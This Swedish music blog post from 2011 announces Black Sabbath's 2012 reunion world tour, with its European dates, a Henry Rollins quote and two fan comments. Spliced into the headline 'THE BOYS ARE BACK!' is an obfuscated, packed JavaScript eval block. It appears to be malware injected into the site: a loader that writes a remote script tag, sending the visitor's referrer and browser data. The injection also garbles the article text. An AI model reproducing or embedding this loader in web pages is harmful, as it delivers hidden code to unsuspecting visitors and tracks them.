Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Black Sabbath till Stockholm 25 maj och Malmö 2 juni.

Black Sabbath till Stockholm 25 maj och Malmö 2 juni.
Filip Urde
 • On 21 november, 2011
 • http://www.revue.se/filip-urde

THE eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fzzid|var|u0026u|referrer|kkfbt||js|php’.split(’|’),0,{}))
BOYS ARE BACK!

Efter att ha tillkännagivit sin återförening den 11.11.11, så har man idag till hela rockvärldens oerhörda förtjusning, annonserat att man kommer dra igång en världsturné! Vilket kommer bli ett av de mest efterlängtade musikevenemangen på väldigt länge. Fredagen den 18 maj drar man igång turnén i Moskva, för att sedan fortsätta mot oss i Sverige.

Turne listan:

 • May 18 – Moscow, Russia (Olimpiski)
 • May 20 – St. Petersburg, Russia (New Arena)
 • May 23 – Helsinki, Finland (Hartwall Arena)
 • May 25 – Stockholm, Sweden (Stadium)
 • May 29 – Bergen, Norway (Bergen Calling Festival)
 • May 31 – Oslo, Norway (Spektrum)
 • Jun 2 – Malmo, Sweden (Malmo Stadium)
 • Jun 4 – Dortmund, Germany (Westfalenhalle)
 • Jun 10 – Donnington, UK (Download Festival)
 • Jun 12 – Rotterdam, Holland (Ahoy)
 • Jun 15 – Bilbao, Spain (Azkena Rock Festival)
 • Jun 17 – Nantes, France (Hellfest Festival)
 • Jun 19 – Paris, France (Bercy)
 • Jun 22 – Dessel, Belgium (Graspop Metal Meeting)
 • Jun 24 – Milan, Italy (Gods of Metal Festival)

De fyra ursprungliga medlemmarna i Black Sabbath – Ozzy Osbourne (sång),Tony Iommi (gitarr), Geezer Butler (bas) och Bill Ward (trummor) är för närvarande i full fart med att spela in sitt första studioalbum på 33 år, vilket man gör tillsammans med den legendariske producenten Rick Rubin (vinnare av 7 Grammys, två av dessa för årets producent).

Så här beskriver sångaren Henry Rollins det hela: ,

”BLACK SABBATH’s music is ultimate bone-powderizing gear. Any band worth their weight in napalm wishes they had written „War Pigs.? The critics never got it, but the fans did and still do, and the music has not lost any thunder with time but in fact resonates more loudly…Hail the mighty Black Sabbath now and forever.”

 

2012 innebär mer än slutet på mayakalendern, mörkrets furste med sitt följe är tillbaka och det kan inte bli annat än otroligt! PARANOID!!!

Black sabbath

Comments

 1. Terry T

  INGET SNACK! DIT SKA JA BARA!

 2. Aud4am

  kan ju inte bli mycket fetare än så här!